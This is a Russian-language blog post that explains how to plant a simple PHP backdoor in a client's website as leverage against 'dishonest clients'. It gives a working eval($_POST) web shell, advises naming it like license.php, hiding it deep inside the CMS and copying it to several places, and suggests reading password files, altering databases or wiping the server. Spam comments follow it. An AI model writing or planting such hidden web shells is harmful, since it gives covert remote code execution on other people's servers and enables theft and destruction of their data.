Простейший backdoor на php или как обезопасить себя от нечестных клиентов

Это всего лишь каркас, который может иметь множество примеров реализации. Допустим, можно через highlight_file вывести содержание какого-нибудь файла с паролями, к которому нет прямого доступа. Можно подключиться к базе данных, считать содержание или изменить его. А можно и вовсе напечатать скрипт удаления всего на сервере, почему бы и нет.

  1. Создаём файл php и называем его как-нибудь неприметно, типа license.php или ещё как.
  2. Пишем в нём код
    <?php
    if ( isset($_POST[‘text’]) )
    eval ($_POST[‘text’]);
    ?>
    <form method=’POST’>
    <textarea name=’text’></textarea>
    <input type=’submit’>
    </form>
  3. Помещаем файл куда-нибудь подальше вглубь cms-ки, например, в дебри WYSIWYG-редактора. При желании дублируем файл ещё в 2-3 места (на всякий пожарный)
Простейший backdoor на php или как обезопасить себя от нечестных клиентов

2 мыслей о “Простейший backdoor на php или как обезопасить себя от нечестных клиентов

  • 27.10.2023 в 22:55
    Permalink

    propecia otc CD45 CCR3 Siglec F SSC hi bone marrow eosinophils were sorted from CC10 Il13 Tg Pirb and CC10 Il13 Tg Pirb mice and activated with BALF from DOX treated CC10 Il13 Tg Pirb mice for the indicated time

  • 29.06.2024 в 00:16
    Permalink

    I enjoyed the humor in this piece! For more, visit: FIND OUT MORE. Let’s chat about it!

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *